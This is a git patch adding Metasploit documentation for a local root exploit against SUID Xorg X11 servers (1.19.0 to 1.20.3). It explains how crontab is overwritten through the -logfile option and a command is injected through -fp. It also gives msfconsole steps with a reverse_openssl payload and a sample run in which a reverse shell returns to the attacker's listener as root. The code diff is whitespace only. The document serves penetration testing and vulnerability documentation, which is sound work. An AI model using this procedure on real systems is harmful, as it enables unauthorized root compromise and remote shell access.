From 538055c4066f687de4b40d6151ecbc9bcbb4c86f Mon Sep 17 00:00:00 2001 From: Aaron Ringo Date: Mon, 12 Nov 2018 15:41:17 -0600 Subject: [PATCH] Initial documentation for Xorg Privesc Module killed white spaces --- .../multi/local/xorg_x11_suid_server.md | 86 +++++++++++++++++++ .../multi/local/xorg_x11_suid_server.rb | 6 +- 2 files changed, 89 insertions(+), 3 deletions(-) create mode 100644 documentation/modules/exploit/multi/local/xorg_x11_suid_server.md diff --git a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md new file mode 100644 index 0000000000..edd9339997 --- /dev/null +++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md @@ -0,0 +1,86 @@ +## Description + + This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron. + + +## Vulnerable Application + + Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions. + + Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere. + + This module has been tested successfully on: + + * OpenBSD 6.3 + * OpenBSD 6.4 + * CentOS 7.5.1084 x86_64 + + +## Verification Steps + On CentOS your session must have console lock. To get a console lock you can login locally with a user. + + 1. Start `msfconsole` + 2. Get a session + 3. Do: `use exploit/multi/local/xorg_x11_suid_server` + 4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl) + 5. Do: `set SESSION [SESSION]` + 6. Do: `set LHOST [LHOST]` + 7. Do: `run` + 8. You should get a new *root* session + + +## Options + + **SESSION** + + Which session to use, which can be viewed with `sessions` + +## Advanced Options + + **Xdisplay** + + Display to use for Xorg (default: `:1`) + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + +## Scenarios + +``` +msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +session => 1 +msf5 exploit(multi/local/xorg_x11_suid_server) > run + +[!] SESSION may not be compatible with this module. +[*] Started reverse double SSL handler on 172.30.0.2:4444 +[+] Passed all initial checks for exploit +[*] Uploading your payload, this could take a while +[*] Trying /etc/crontab overwrite +[+] /etc/crontab overwrite successful +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Waiting on cron to run +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo t2XWfcWkZHevLPS8; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "t2XWfcWkZHevLPS8\n" +[*] Matching... +[*] A is input... +[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600 +[+] Returning session after cleaning +[+] Deleted /tmp/.session-odRjfx + +id +uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) +``` diff --git a/modules/exploits/multi/local/xorg_x11_suid_server.rb b/modules/exploits/multi/local/xorg_x11_suid_server.rb index 98d38db16f..b4406da57c 100644 --- a/modules/exploits/multi/local/xorg_x11_suid_server.rb +++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'Narendra Shinde', # Discovery and exploit 'Raptor - 0xdea', # Modified exploit for cron - 'Aaron Ringo', # Metasploit module + 'Aaron Ringo', # Metasploit module 'Brendan Coles ' # Metasploit module ], 'DisclosureDate' => 'Oct 25 2018', @@ -48,8 +48,8 @@ class MetasploitModule < Msf::Exploit::Local [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] ], 'Platform' => %w(openbsd linux), - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], - 'SessionTypes' => %w(shell meterpreter), + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'SessionTypes' => %w(shell meterpreter), 'Targets' => [ ['OpenBSD', {